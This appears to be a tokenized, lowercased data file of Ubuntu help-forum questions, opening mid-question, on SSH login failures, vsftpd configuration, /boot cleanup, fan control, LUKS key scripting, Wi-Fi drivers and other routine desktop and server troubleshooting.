, please try again . on some research i realized that , i need to monitor my server 's auth log for this . i got the following error in my auth log ( /var/log/auth.log ) jul 2 09:38:07 ip-192-xx-xx-xxx sshd [ 3037 ] : pam_unix ( sshd : auth ) : authentication failure ; logname= uid=0 euid=0 tty=ssh ruser= rhost=my_client_ip user=senthil jul 2 09:38:09 ip-192-xx-xx-xxx sshd [ 3037 ] : failed password for senthil from my_client_ip port 39116 ssh2 when i tried to debug using : ssh -v senthil @ server_ip openssh_5.9p1 debian-5ubuntu1 , openssl 1.0.1 14 mar 2012 debug1 : reading configuration data /etc/ssh/ssh_config debug1 : /etc/ssh/ssh_config line 19 : applying options for * debug1 : connecting to server_ip [ server_ip ] port 22. debug1 : connection established . debug1 : identity file { my-workspace } /.ssh/id_rsa type 1 debug1 : checking blacklist file /usr/share/ssh/blacklist.rsa-2048 debug1 : checking blacklist file /etc/ssh/blacklist.rsa-2048 debug1 : identity file { my-workspace } /.ssh/id_rsa-cert type -1 debug1 : identity file { my-workspace } /.ssh/id_dsa type -1 debug1 : identity file { my-workspace } /.ssh/id_dsa-cert type -1 debug1 : identity file { my-workspace } /.ssh/id_ecdsa type -1 debug1 : identity file { my-workspace } /.ssh/id_ecdsa-cert type -1 debug1 : remote protocol version 2.0 , remote software version openssh_5.8p1 debian-7ubuntu1 debug1 : match : openssh_5.8p1 debian-7ubuntu1 pat openssh* debug1 : enabling compatibility mode for protocol 2.0 debug1 : local version string ssh-2.0-openssh_5.9p1 debian-5ubuntu1 debug1 : ssh2_msg_kexinit sent debug1 : ssh2_msg_kexinit received debug1 : kex : server- > client aes128-ctr hmac-md5 none debug1 : kex : client- > server aes128-ctr hmac-md5 none debug1 : sending ssh2_msg_kex_ecdh_init debug1 : expecting ssh2_msg_kex_ecdh_reply debug1 : server host key : ecdsa { server_host_key } debug1 : host 'server_ip ' is known and matches the ecdsa host key . debug1 : found key in { my-workspace } /.ssh/known_hosts:1 debug1 : ssh_ecdsa_verify : signature correct debug1 : ssh2_msg_newkeys sent debug1 : expecting ssh2_msg_newkeys debug1 : ssh2_msg_newkeys received debug1 : roaming not allowed by server debug1 : ssh2_msg_service_request sent debug1 : ssh2_msg_service_accept received debug1 : authentications that can continue : password debug1 : next authentication method : password senthil @ server_ip 's password : debug1 : authentications that can continue : password permission denied , please try again . senthil @ server_ip 's password : for password , i have entered the same value which i normally use for 'ubuntu ' user . can anyone please guide me where the issue is and suggest some solution for this issue ?
315378	ubuntu web server : ftp connection timeout	to enable ftp service recently i have installed vsftpd using this instructions in my ubuntu web server . but i 'm still unable to access my server directory using ftp . i do n't know what to do or what 's the problem . say , my domain test.test2.example.com and able to access it using ssh from remote . like : ssh -y user1 @ test.test2.example.com but not able to access through ftp , using : ftp test.test2.example.com it 's showing ftp : connect : connection timed out i thought ftp service is not installed into my server , that 's why i installed vsftpd . but it 's still not working out . updated with vsftpd configuration file # example config file /etc/vsftpd.conf # # the default compiled in settings are fairly paranoid . this sample file # loosens things up a bit , to make the ftp daemon more usable . # please see vsftpd.conf.5 for all compiled in defaults . # # read this : this example file is not an exhaustive list of vsftpd options . # please read the vsftpd.conf.5 manual page to get a full idea of vsftpd's # capabilities . # # # run standalone ? vsftpd can run either from an inetd or as a standalone # daemon started from an initscript . listen=yes # # run standalone with ipv6 ? # like the listen parameter , except vsftpd will listen on an ipv6 socket # instead of an ipv4 one . this parameter and the listen parameter are mutually # exclusive . # listen_ipv6=yes # # allow anonymous ftp ? ( beware - allowed by default if you comment this out ) . anonymous_enable=no # # uncomment this to allow local users to log in . local_enable=yes # # uncomment this to enable any form of ftp write command . write_enable=yes # # default umask for local users is 077 . you may wish to change this to 022 , # if your users expect that ( 022 is used by most other ftpd 's ) # local_umask=022 # # uncomment this to allow the anonymous ftp user to upload files . this only # has an effect if the above global write enable is activated . also , you will # obviously need to create a directory writable by the ftp user . # anon_upload_enable=yes # # uncomment this if you want the anonymous ftp user to be able to create # new directories . # anon_mkdir_write_enable=yes # # activate directory messages - messages given to remote users when they # go into a certain directory . dirmessage_enable=yes # # if enabled , vsftpd will display directory listings with the time # in your local time zone . the default is to display gmt . the # times returned by the mdtm ftp command are also affected by this # option . use_localtime=yes # # activate logging of uploads/downloads . xferlog_enable=yes # # make sure port transfer connections originate from port 20 ( ftp-data ) . connect_from_port_20=yes # # if you want , you can arrange for uploaded anonymous files to be owned by # a different user . note ! using `` root '' for uploaded files is not # recommended ! # chown_uploads=yes # chown_username=whoever # # you may override where the log file goes if you like . the default is shown # below . # xferlog_file=/var/log/vsftpd.log # # if you want , you can have your log file in standard ftpd xferlog format . # note that the default log file location is /var/log/xferlog in this case . # xferlog_std_format=yes # # you may change the default value for timing out an idle session . # idle_session_timeout=600 # # you may change the default value for timing out a data connection . # data_connection_timeout=120 # # it is recommended that you define on your system a unique user which the # ftp server can use as a totally isolated and unprivileged user . # nopriv_user=ftpsecure # # enable this and the server will recognise asynchronous abor requests . not # recommended for security ( the code is non-trivial ) . not enabling it , # however , may confuse older ftp clients . # async_abor_enable=yes # # by default the server will pretend to allow ascii mode but in fact ignore # the request . turn on the below options to have the server actually do ascii # mangling on files when in ascii mode . # beware that on some ftp servers , ascii support allows a denial of service # attack ( dos ) via the command `` size /big/file '' in ascii mode . vsftpd # predicted this attack and has always been safe , reporting the size of the # raw file . # ascii mangling is a horrible feature of the protocol . # ascii_upload_enable=yes # ascii_download_enable=yes # # you may fully customise the login banner string : # ftpd_banner=welcome to blah ftp service . # # you may specify a file of disallowed anonymous e-mail addresses . apparently # useful for combatting certain dos attacks . # deny_email_enable=yes # ( default follows ) # banned_email_file=/etc/vsftpd.banned_emails # # you may restrict local users to their home directories . see the faq for # the possible risks in this before using chroot_local_user or # chroot_list_enable below . chroot_local_user=yes # # you may specify an explicit list of local users to chroot ( ) to their home # directory . if chroot_local_user is yes , then this list becomes a list of # users to not chroot ( ) . # ( warning ! chroot'ing can be very dangerous . if using chroot , make sure that # the user does not have write access to the top level directory within the # chroot ) # chroot_local_user=yes # chroot_list_enable=yes # ( default follows ) # chroot_list_file=/etc/vsftpd.chroot_list # # you may activate the `` -r '' option to the builtin ls . this is disabled by # default to avoid remote users being able to cause excessive i/o on large # sites . however , some broken ftp clients such as `` ncftp '' and `` mirror '' assume # the presence of the `` -r '' option , so there is a strong case for enabling it . # ls_recurse_enable=yes # # customization # # some of vsftpd 's settings do n't fit the filesystem layout by # default . # # this option should be the name of a directory which is empty . also , the # directory should not be writable by the ftp user . this directory is used # as a secure chroot ( ) jail at times vsftpd does not require filesystem # access . secure_chroot_dir=/var/run/vsftpd/empty # # this string is the name of the pam service vsftpd will use . pam_service_name=vsftpd # # this option specifies the location of the rsa certificate to use for ssl # encrypted connections . rsa_cert_file=/etc/ssl/private/vsftpd.pem
315383	detect error of a running process ?	i have a to execute a process that sometimes produces an error . however every time it produces that error , it does n't exit the process . aneesh @ nb-14 : ~ $ emulator -no-boot-anim -avd andreud emulator error : unable to load vm from snapshot . the snapshot file was saved for a different hardware configuration ^z aneesh @ nb-14 : ~ $ emulator -no-boot-anim -avd andreud on success the cursor is at the beginning of the second line above and the emulator error does n't show up . on failure it shows the error but i am forced to stop it . the commands might seem to show that this question is off-topic . however my question is how ( via a command ) to detect this error while this process is still running and if yes kill it .
315385	how do i put an icon at the bottom of the unity bar ?	i want to move the 'change desktop ' icon to the bottom of he unity bar , next to the trash ( i 'd actually like to get rid of the trash , too ... ) , but i ca n't find any options for that anywhere . how would i do this ? i am running ubuntu 13.04 ( raring ringtail ) 64-bit .
315390	prevent laptop from going to suspend mode	i want to prevent my laptop ( running ubuntu 12.04 ) from going to suspend mode ( as wifi gets disconnected ) while watching video ( youtube , totem_player ) and especially when downloading files from my chrome browser . also , is there a way to detect if the video is playing or not so that the computer may go to suspend mode only when video is not playing or paused . further , i already tried caffeine and it is continuously detecting open video_player even though nothing is playing ( on pause or stop mode ) . is there an efficient way of accomplishing this ?
315393	how to share internet connection	i have a lg p500 with android 4.1 and i want to share internet connection ( lan ) to it . i have usb cable ( for phone ) , bluetooth dongle , wifi dongle ( tl-wn821n ) to use .
315395	phone config prob in 13.04 !	i 've recently installed ubuntu and it 's perfect , but when i connnect my phone via a usb cable to my ubuntu laptop below shown error message pops up . tell me how can i fix it . at least my folder also opens but i have an 5.9 gb memory in the card and the folder shows just this cities folder . also i ca n't paste anything to it .
315396	disk partitioning while installing ubuntu 12.04	i am an absolute beginner in linux and i have problems with partitioning my disk space while installing ubuntu 12.04 . i have 300 gb of unallocated space on my hard disk . how can i divide the available space ? my music collection is almost 170 gb and how can i make space for these music files ( like d : drive in windows )
315398	wifi dead slow with wpa2 enterprise 12.04	i am using wifi with wpa2 enterprise protocol . wifi is dead slow and sometimes i get 'connection lost ' error . my university has no support for linux and advised me to write my own wifi driver . any other alternatives for this problem ? wifi at my home is working fine and fast but problem is with university wifi only . nm-tool output : device : wlan0 [ eduroam ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : 802.11 wifi driver : brcmsmac state : connected default : yes hw address : 70 : f1 : a1 : d0:18:18 capabilities : speed : 72 mb/s wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes lspci output : 04:00.0 network controller : broadcom corporation bcm4313 802.11b/g/n wireless lan controller ( rev 01 ) uname -a : linux zaif 3.2.0-48-generic # 74-ubuntu smp thu jun 6 19:43:26 utc 2013 x86_64 x86_64 x86_64 gnu/linux
315399	trouble with libreoffice 4.0 . * in ubuntu 12.04	i have used libreoffice impress to give presentations at meetings for some time now . the current version of libreoffice in ubuntu 12.04 is 3.5.7.2 and this works fine for me . recently , following a recommendation from a colleague , i installed libreoffice 4.0.something using the libreoffice ppa . this worked , but i discovered when going into slide show mode most of the graphics ( line graphs ) disappeared , even though they were perfectly visible in the original . lettering , drawings , and pictures came over , but not the line graphs ( which were originally inserted in .eps format most likely ) . with some effort i managed to uninstall the more recent version of libreoffice , and reinstall the version in the ubuntu repositories ( 3.5.7.2 ) and the graphs now appear as expected in the slide show mode . is there any explanation for this behaviour ?
315403	how to delete public shared link of ubuntu one ?	i have a big folder in my ubuntu one cloud , which i shared by creating public to one of my friend . now i want to delete that link without deleting the folder from my ubuntu one share folder . can i do that ? edited for image insert --
315408	open terminal with multiple tabs and execute application	i am new to linux shell scripting . i want to write a shell script which will open terminal with multiple tabs ; it should run rtsp client app in each tab . for this , i have gone through question here in this forum and tried to code like bellow , tab= '' -- tab-with-profile=default -e `` cmd= '' java runrtspclient '' for i in 1 2 3 4 5 do # foo= '' $ foo $ tab $ cmd '' done gnome-terminal $ foo exit 0 this is running and opens the terminal window with tabs but suddenly it will close . i am not getting any errors .
315413	how do i find where an application is installed ?	i installed wireshark recently . i have no idea in which directory it was installed , but it 's not in /opt . how do i find where it 's installed ?
315414	ubuntu 13.04 : no sound	i have recently installed ubuntu 13.04 , my headset/earplug is n't working on it , sound is produced only through speakers . what should i do ? i need to make the earphones work . thanks . here is the output of my alsa-info.sh : http : //pastebin.com/hsznc2qa and here is the output of my alsamixer :
315415	could not create a currency converter phone app	just follow `` http : //developer.ubuntu.com/resources/tutorials/getting-started/currency-converter-phone-app/ '' to new a project . the step is bellow : the main view we’ll start off with a minimum qml canvas with our first ubuntu component : a label inside the main view . 1 . in qt creator , press ctrl+n to create a new project 2 . select the projects > ubuntu > simple touch ui template and click choose… 3 . give the project currencyconverter as a name . you can leave the create in : field as the default and then click next . 4 . you can optionally set up a revision control system such as bazaar in the final step , but that’s outside the scope of this tutorial . click on finish . 5 . replace the column component and all of its children , and replace them with the page as shown below , and then save it with ctrl+s : but in step 2 : select the projects > ubuntu > simple touch ui template and click choose… there is n't a `` ubuntu '' option for select . for more information as bellow pictures . ubuntu-sdk new project screencut as bellow : http : //i.stack.imgur.com/zua58.png
315425	how to update imagemagick ( imagick ) for php	i 've installed imagemagick for php using the following command : sudo apt-get install php5-imagick but the version installed ( namely imagemagick 6.6.9-7 2012-08-17 q16 ) is not the latest version ( currently 6.8.6 ) and it has some bugs with prevent a php script to run . so ... how to upgrade to the latest version ? idiot-proof step by step instructions would do the trick .
315426	issue with apache flat files on ocfs2 on san	i have a pretty basic apache three node cluster with flat files on san using ocfs2 file system mounted on both nodes.the website is working as expected , but i see a lot of the following messages in the servers ' syslogs : [ 2831.611120 ] ( apache2,6984,3 ) : ocfs2_check_dir_for_entry:2119 error : status = -17 [ 2831.611200 ] ( apache2,6984,3 ) : ocfs2_mknod:459 error : status = -17 [ 2831.611246 ] ( apache2,6984,3 ) : ocfs2_create:629 error : status = -17 [ 12240.404950 ] ( apache2,1805,2 ) : ocfs2_check_dir_for_entry:2119 error : status = -17 [ 12240.405052 ] ( apache2,1805,2 ) : ocfs2_mknod:459 error : status = -17 [ 12240.405098 ] ( apache2,1805,2 ) : ocfs2_create:629 error : status = -17 anyone seen this before ? i would really like to get rid of these error messages .
315427	bootable usb stick	can someone tell me any other way to make a bootable usb stick because my `` make startup disk '' is not working , it is not loading the image after selecting the image from the usb-creator-gtk window . i have a image of ubuntu 13.04 .
315429	server /boot partition is filling up , can i apt-get remove images inbetween the current and the latest ?	i have a server which is running ubuntu with automatic security updates , /boot is now nearly full ( 93 % ) . below is the output of dpkg -l `` linux-image* '' ii linux-image-3.2.0-24-generic 3.2.0-24.39 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.2.0-36-generic 3.2.0-36.57 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.2.0-37-generic 3.2.0-37.58 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.2.0-38-generic 3.2.0-38.61 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.2.0-39-generic 3.2.0-39.62 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.2.0-40-generic 3.2.0-40.64 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.2.0-41-generic 3.2.0-41.66 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.2.0-43-generic 3.2.0-43.68 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.2.0-44-generic 3.2.0-44.69 linux kernel image for version 3.2.0 on 64 bit x86 smp if linux-image-3.2.0-45-generic 3.2.0-45.70 linux kernel image for version 3.2.0 on 64 bit x86 smp if linux-image-3.2.0-48-generic 3.2.0-48.74 linux kernel image for version 3.2.0 on 64 bit x86 smp iu linux-image-server 3.2.0.48.58 linux kernel image on server equipment . the server is currently running on 3.2.0-24-generic # uname -r 3.2.0-24-generic so my question is can i remove the images inbetween the latest and the running one safely ? apt-get purge linux-image-3.2.0-36-generic linux-image-3.2.0-37-generic linux-image-3.2.0-38-generic linux-image-3.2.0-39-generic linux-image-3.2.0-40-generic linux-image-3.2.0-41-generic linux-image-3.2.0-43-generic linux-image-3.2.0-44-generic i understand that i ideally need to reboot the server to bring it up to the latest and then i can clean up the rest but finding a time to reboot with the client is proving ... . dificult thanks guys : - )
315430	update manager on ubuntu 12.04	i ca n't find the update manager when i tried searching it on the dash home bar . help please ?
315431	startup applications with zsh and xmonad	i 'm running ubuntu 12.04 . i use zsh as my shell and xmonad as my window manager . i do n't use gnome or any other desktop environment . i 'd like to declare some 'startup commands . ' by this i mean , after i login and xmonad has started , i would like to run some commands that open my browser and a terminal window . i can not access the 'startup applications ' in the gnome menu , nor do i have a .bash_profile to insert these commands in . how can i declare these commands ?
315443	i am not able to make dual boot in asus s56ca	i am not able to make ubuntu dualboot in my asus s56ca . i installed ubuntu but then windows not working . in the boot screen it shows windows 8 but it shows some error .
315444	bluetooth usb adapter and headset paired but no sound	i want to be able to use a bluetooth wireless headset as my audio out/in . the default install properly detects the presents of the new usb hardware and after going through the bluetooth menu options , i can pair with the bluetooth headset . however , i am not given an option to select this as the audio output device from the settings- > sound graphical interface . community documentation seems to be focused on ubuntu 7,9 , and 10 , saying that this should be automatic after 10.04 . how do i add this ? thanks . hardware : bluetooth usb adapter 2.0 : i can confirm both working independently on different machines . 1 . model # k33348b 2. by kensington 3 . ( no pdf manual as kensington.com has forgotten they ever sold this product ? ) bluetooth headset : 1 . model # 4915a-h500 2. by motorola 3. manual : http : //www.motorola.com/mdirect/manuals/qg-h500_9494a56o.pdf software tried so far : ubuntu 13.04 seems to pair correctly from the normal bluetooth graphical interface default install sound settings even when paired , does n't show up . only shows `` digital output ( s/pdif ) '' and `` analog output '' but there should be one for hdmi , front , mainboard-back , a sound card with full surround sound , and one of those light cables , in addition to the now paired bluetooth headset that also does n't show up . stream2ip found an online article , but since has been uninstalled since it was third-party and did n't work . does not detect anything at all and finds no devices . pavucontrol only detects the `` hdmi/displayport '' adapter . pactl $ pactl list cards short 0 alsa_card.pci-0000_01_00.1 module-alsa-card.c 1 alsa_card.pci-0000_00_1b.1 module-alsa-card.c any suggestions ?
315445	ubuntu 12.04 on asus n76vb fan speed not working	i instaled lm-sensors followed everyting 1 @ ubuntu : ~ $ sudo sensors-detect perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_us.utf-8 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . # sensors-detect revision 5984 ( 2011-07-10 21:22:53 +0200 ) # system : asustek computer inc. n76vb ( laptop ) this program will help you determine which kernel modules you need to load to use lm_sensors most effectively . it is generally safe and recommended to accept the default answers to all questions , unless you know what you 're doing . some south bridges , cpus or memory controllers contain embedded sensors . do you want to scan for them ? this is totally safe . ( yes/no ) : yes module cpuid loaded successfully . silicon integrated systems sis5595 ... no via vt82c686 integrated sensors ... no via vt8231 integrated sensors ... no amd k8 thermal sensors ... no amd family 10h thermal sensors ... no amd family 11h thermal sensors ... no amd family 12h and 14h thermal sensors ... no amd family 15h thermal sensors ... no amd family 15h power sensors ... no intel digital thermal sensor ... success ! ( driver `coretemp ' ) intel amb fb-dimm thermal sensor ... no via c7 thermal sensor ... no via nano thermal sensor ... no some super i/o chips contain embedded sensors . we have to write to standard i/o ports to probe them . this is usually safe . do you want to scan for super i/o sensors ? ( yes/no ) : yes probing for super-i/o at 0x2e/0x2f trying family `national semiconductor/ite ' ... no trying family `smsc ' ... no trying family `via/winbond/nuvoton/fintek ' ... no trying family `ite ' ... no probing for super-i/o at 0x4e/0x4f trying family `national semiconductor/ite ' ... no trying family `smsc ' ... no trying family `via/winbond/nuvoton/fintek ' ... no trying family `ite ' ... no some hardware monitoring chips are accessible through the isa i/o ports . we have to write to arbitrary i/o ports to probe them . this is usually safe though . yes , you do have isa i/o ports even if you do not have any isa slots ! do you want to scan the isa i/o ports ? ( yes/no ) : yes probing for `national semiconductor lm78 ' at 0x290 ... no probing for `national semiconductor lm79 ' at 0x290 ... no probing for `winbond w83781d ' at 0x290 ... no probing for `winbond w83782d ' at 0x290 ... no lastly , we can probe the i2c/smbus adapters for connected hardware monitoring devices . this is the most risky part , and while it works reasonably well on most systems , it has been reported to cause trouble on some systems . do you want to probe the i2c/smbus adapters now ? ( yes/no ) : yes found unknown smbus adapter 8086:1e22 at 0000:00:1f.3 . sorry , no supported pci bus adapters found . next adapter : i915 gmbus ssc ( i2c-0 ) do you want to scan it ? ( yes/no/selectively ) : yes next adapter : i915 gmbus vga ( i2c-1 ) do you want to scan it ? ( yes/no/selectively ) : yes client found at address 0x49 probing for `national semiconductor lm75 ' ... yeno probing for `national semiconductor lm75a ' ... no probing for `dallas semiconductor ds75 ' ... sno probing for `national semiconductor lm77 ' ... no probing for `analog devices adt7410 ' ... no probing for `dallas semiconductor ds1621/ds1631 ' ... no probing for `maxim max6642 ' ... no probing for `national semiconductor lm73 ' ... no probing for `national semiconductor lm92 ' ... no probing for `national semiconductor lm76 ' ... no probing for `maxim max6633/max6634/max6635 ' ... no probing for `nxp/philips sa56004 ' ... no probing for `smsc emc1023 ' ... no probing for `smsc emc1043 ' ... no probing for `smsc emc1053 ' ... no probing for `smsc emc1063 ' ... no client found at address 0x50 probing for `analog devices adm1033 ' ... no probing for `analog devices adm1034 ' ... no probing for `spd eeprom ' ... no probing for `edid eeprom ' ... yes ( confidence 8 , not a hardware monitoring chip ) next adapter : i915 gmbus panel ( i2c-2 ) do you want to scan it ? ( yes/no/selectively ) : yes client found at address 0x50 probing for `analog devices adm1033 ' ... no probing for `analog devices adm1034 ' ... no probing for `spd eeprom ' ... no probing for `edid eeprom ' ... yes ( confidence 8 , not a hardware monitoring chip ) next adapter : i915 gmbus dpc ( i2c-3 ) do you want to scan it ? ( yes/no/selectively ) : yes next adapter : i915 gmbus dpb ( i2c-4 ) do you want to scan it ? ( yes/no/selectively ) : yes next adapter : i915 gmbus dpd ( i2c-5 ) do you want to scan it ? ( yes/no/selectively ) : yes next adapter : dpddc-c ( i2c-6 ) do you want to scan it ? ( yes/no/selectively ) : yes now follows a summary of the probes i have just done . just press enter to continue : driver `coretemp ' : * chip `intel digital thermal sensor ' ( confidence : 9 ) to load everything that is needed , add this to /etc/modules : # -- -- cut here -- -- # chip drivers coretemp # -- -- cut here -- -- if you have some drivers built into your kernel , the list above will contain too many modules . skip the appropriate ones ! do you want to add these lines automatically to /etc/modules ? ( yes/no ) yes successful ! monitoring programs wo n't work until the needed modules are loaded . you may want to run 'service module-init-tools start' to load them . unloading cpuid ... ok then sudo service module-init-tools restart then sensor and i get this response acpitz-virtual-0 adapter : virtual device temp1 : +46.0 c ( crit = +108.0 c ) coretemp-isa-0000 adapter : isa adapter physical id 0 : +46.0 c ( high = +87.0 c , crit = +105.0 c ) core 0 : +46.0 c ( high = +87.0 c , crit = +105.0 c ) core 1 : +45.0 c ( high = +87.0 c , crit = +105.0 c ) core 2 : +43.0 c ( high = +87.0 c , crit = +105.0 c ) core 3 : +44.0 c ( high = +87.0 c , crit = +105.0 c ) asus-isa-0000 adapter : isa adapter temp1 : +46.0 c then i installed fancontrol and when i tryed to run sudo pwmconfig this program will search your sensors for pulse width modulation ( pwm ) controls , and test each one to see if it controls a fan on your motherboard . note that many motherboards do not have pwm circuitry installed , even if your sensor chip supports pwm . we will attempt to briefly stop each fan using the pwm controls . the program will attempt to restore each fan to full speed after testing . however , it is ** very important ** that you physically verify that the fans have been to full speed after the program has completed . /usr/sbin/pwmconfig : there are no fan-capable sensor modules installed adn i can not find a way to make my fan change speed can someone help me i dont know if its due to the chipset or configuration asus n67vb intel® core™ i7 3630qm processor intel® hm76 chipset ddr3 1600 mhz sdram 12gb nvidia® geforce® gt 740m with 4gb ddr3 vram
315446	cryptsetup luksaddkey pipe	i hope this is the correct place to make this question . anyway ... i was trying to create a script to add a passphrase by piping it to the command luksaddkey with a script . when i try to pipe the `` old '' passphrase i get this error : no key available with this passphrase . and the code i run in the terminal is the following : sudo ./change_key_script oldpassphrase newpassphrase this is the script : # ! /bin/bash oldpassword= $ 1 newpassword= $ 2 rootdevice=`sudo blkid | grep disk-uuid | awk '/ : / { print $ 1 } ' | sed 's/\ ( . *\ ) ./\1/'` # # enabled key enabledkey=`sudo cryptsetup luksdump /dev/sdax | grep ' : enabled ' | awk ' { print $ 3 } ' | xargs | sed 's/\ ( . *\ ) ./\1/'` ( echo -ne $ oldpassword ; echo -ne $ newpassword ; echo -ne $ newpassword ) | cryptsetup luksaddkey $ rootdevice thanks in advance for the answers .
315450	make mate 1.6 look like lucid lynx default theme	i happened to like the way lucid lynx looks . this is not a lucid lynx question , i just want the panels on mate 1.6 to look like the ones of lucid lynx . i went to the properties of the panel , but it says the colour is a system theme . -thus i can not manage to get the exact same look . i have copied the themes out of /usr/share/themes but i still do not get the same look . this is strictly an question of aesthetics . i loved the theme of lucid , and just want to continue using something that looks the same . how can i achieve this look in mate 1.6 ? i am using ubuntu 13.04
315453	where should i add/modify environment variables ?	i would like to edit my .bash_profile file . however it appears that in ubuntu ( and perhaps other debian distros ) this is named as .profile . however i can not seem to find the expected variables like $ path , $ ps etc . in the .profile file . the .bashrc file does n't seem to do any good either . i am wondering how i can possibly modify my environment variables in this case .
315458	reboot ubuntu without a complete hardware reboot	i would like to reboot the os as if it is pulled up from grub , but without actually rebooting the entire computer . this is because this machine has a bunch of different oses on it and while a reboot is necessary human interaction for boot options selection is not under this scenario . any ideas ? i know you can drop down to various run-levels but i am not aware of ( lets call it ) `` an incomplete software-reboot '' .
315459	deluge daemon connection ?	my deluge-console is suddenly giving me this error failed to connect to 127.0.0.1:58846 with reason : connection refused why is this error.i have done nothing and the gui deluge runs fine.its the problem in console only ? why localhost is refusing connection and how do i connect to daemon ? i have tried the command connect 127.0.0.1 58846 but it doesnt seems to work .
315463	making openstack grizzly work on ubuntu raring ( 13.04 )	canonical says that they have `` tightly integrated '' openstack grizzly into their raring ringtail release . yet i fail to make this work at all , currently . so i got a fresh install of raring server on a physical box . my first attempt was to follow the official documentation : https : //help.ubuntu.com/13.04/serverguide/ubuntucloud.html unfortunately , these instructions are simply outdated , despite the /13.04/ in the url . they are just cut and paste from an earlier version . i failed in the middle of the `` install openstack compute ( nova ) '' section because the nova-manage user subcommand just is n't there any more in the grizzly release ; they have moved to keystone . not that nobody would have noticed yet : https : //bugs.launchpad.net/serverguide/+bug/1106139 as a next attempt , i want to devstack.org . no luck on 13.04 ; just not working . i re-installed the host server to 12.04 and used the devstack.org grizzly branch and was able to get something up and running , yet there are many issues with a devstack setup system . ( different story . ) so i wonder if nobody ever tried to create a single-node openstack server on top of ubuntu 13.04 ( raring ) with the grizzy release of openstack ; except going down the maas / juju path with 10+ machines . any hints are welcome !
315465	driver updating	i need to update the drivers being used by my dibcom 7000 dvb card . i have the drivers but can not copy them to the correct directory . i seem to not have the correct rights . how can i change my rights or move the files ?
315469	shutdown 0 always remains in single-user mode	when i attempt to shutdown with the gear icon , the login screen always comes back . when i ctrl+alt+f1 into a pty , logon and run shutdown 0 , it goes into single-user mode but remains there . subsequent attempts produce the same result . i grepped /var/log/* ( as root ) for `` shutdown '' but found nothing . man shutdown only mentions that it writes a record to /var/log/wtmp and utmp which are binary files , and which does n't sound like it will help me much in this case since the docs indicates they appear to be about tracking logins and logouts , not attempts to shut down the system . i ca n't write down all the messages that it dumps on the screen . how else can i debug this ? does n't shutdown leave a trace somewhere ?
315483	how to be warned when downgrading a package will break a depender	when i want to install a package , but that package depends on a package version older than what is installed on my system , how can i determine whether downgrading the package will break any other packages that may have depended on a higher version ? i 've had to do this for a lot of packages since reinstalling ubuntu 12.10 over 12.04. is that a related problem ? what i 've tried : - searching ubuntu forums and askubuntu ( not relevant questions ) googling ( again , gives irrelevant or no results ) trying it out for myself ( could n't find a set of suitable packages to try on ) i apologize if this question has been asked before already on this site as i probably had n't framed my searches with the correct terminology . 10x .
315484	virtual box on mac running slow	i am having an issue , iâm using virtual box to run ubuntu , its very slow and i gave it 1 gb of ram i 'm not sure if i 'm doing something wrong . i heard that ubuntu flies and from the tutorial i saw online it did . iâm running the new 13.04 ..please help thank you . what i have done thus far is the basics , i went over my settings to see if i configured them as per the tutorial . everything seems right .
315491	setting up cluster configuration using an existing web server as a primary node ?	we currently have a primary node , which resides in the us within a datacenter , but we are going to be using this for all serious bandwidth and resource intensive websites , and through a configuration of virtualmin + webmin , will be setup as a sort of pseudo-cluster , using virtualmins cluster modules . anyways , on to the issue : we also have a business line setup locally , with three servers . here are their specs : intel p4 2 . 4 ghz , 1 gb ram , 110 gb sata , ubuntu 12 . 04* amd 1 . 3 ghz , 512 mb ram , 20 gb ide p3 xeon 800mhz ( dual physical processors ) , 1 gb ram , 3 * 25 gb raid configuration ( one in use for host operating system ) . the first machine is currently in use and is serving virtual hosts off a sub-domain . my question is this : how can i integrate the secondary node ( which will be the primary node per say , in this smaller configuration ... ) which is currently in use , into the cluster configuration w/ the other two servers for : sharing resources redundancy ( ha ? ) nfs /w the two raid disks without having the format the secondary node , and start fresh moving all my services in to a drbd network drive or something similar , and than restoring all active virtualmin 's virtual hosts . the idea is that i want minimal downtime to people currently being served from server2.mywebsite.com , and from what i understand , all services need to be on a nfs so that they can be mounted on demand and accessed from the other machine taking over ( i.e . heartbeat + drbd config . ) my issue is that i already have all these services installed to their default directory structure : how can i most easily setup this nfs and ha system , move all my desires services to this new drive , and do it with minimal down time , and without breaking virtualmin and everything else on my server ?
315501	dolby editor required ?	i have dolby home theatre given with my acer laptop inbuilt . windows was given with a dolby editor to control the audio how to get the dolby editor in ububtu ? ? ?
315503	aruba vpn configuration for ubuntu server 12.04	i need to configure vpn client for aruba intranet access . aruba provides vpn clients only for windows , mac and android not for linux . may be someone can help me to configure linux server ? thank you in advance .
315504	which version i should choose the 12.04 lts or 13.04 ?	i 'm confused that which version should install , 12.04 lts or 13.04 ? what i 'm missing in 12.04 ?
315512	ubuntu 13.04 on dell inspiron 1520 ( wifi not working )	i have a dell inspiron 1520 that is rather finicky and had windows xp installed on it . i recently installed ubuntu 13.04 `` raring ringtail '' , and since , i have n't been able to get the wifi to work . it has a dell 1390 wlan mini card for wifi . any ideas are appreciated , i have spent hours searching this and many other forums for a solution , and have n't found any that will work . thanks , new ubuntu user
